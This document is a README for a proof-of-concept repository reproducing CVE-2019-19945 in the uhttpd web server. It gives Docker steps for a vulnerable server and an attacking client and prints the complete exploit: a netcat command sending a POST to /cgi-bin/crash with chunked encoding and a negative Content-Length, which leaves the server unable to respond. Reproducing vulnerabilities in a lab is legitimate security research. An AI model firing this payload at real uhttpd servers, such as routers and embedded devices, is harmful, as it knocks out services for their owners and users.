# CVE-2019-19945_Test
This is the code for the first Proposed CVE
1. Install Docker
2. Build & RUN Server
cd Server
docker build -t server/cve .
docker run -d --name server -p 80:80 server/cve
4. Get Server Container IP
sudo docker container inspect server | grep -i IPAddress
Windows Powershell
docker container inspect server | Select-String "IPAddress"
Extract IP and add it to Command for building the Client
You can check the server by going to localhost:80 in your browser
5. Build & Run Client
by uncommenting the CMD in the Client/Dockerfile the attack will automatically start with the start of the container
cd ../Client/
docker build --build-arg server_ip=<SERVER_IP> -t client/cve .
docker run -d -p 8080:8080 client/cve
6. Attach to CLient Docker
docker container ls
find client/cve container && attach
docker exec -it <ContainerID> /bin/sh
7. When Ready Launch Attack
8. Server will be unable to respond
### Commented Source Code
There really is no use in providing commented Sourcecode as the Exploit is very short
The Exploit then consits of using Netcat and sending a Post request with a negative large Content-Length to the Server Concering the handling of files in the cgi-bin/ directory
The Execution is conducted using a simple netcat script. Here Referencing a file in the CGI-bin Folder of the Server called Crash
nc <SERVER_IP> < crash.poc
##### crash.poc
POST /cgi-bin/crash HTTP/1.0
Transfer-Encoding: chunked
Content-Length: -100000
The largest issue was trying to get the old versions of uhttpd to run in a up to date docker environment.
[4.0K] /data/pocs/4ba6d03c9982b1b802d9561d92c2b5911c623264
├── [4.0K] Client
│ ├── [ 471] Dockerfile
│ └── [ 228] poc.tar.gz
├── [1.6K] README.md
└── [4.0K] Server
├── [1.5K] Dockerfile
├── [ 167] index.html
├── [ 74K] libubox.tar.gz
├── [ 11K] LICENSE
├── [252K] uhttpbuild.tar.gz
├── [ 32K] uhttpd-5f9ae57.tar.gz
└── [ 92] uhttpd.conf
2 directories, 10 files
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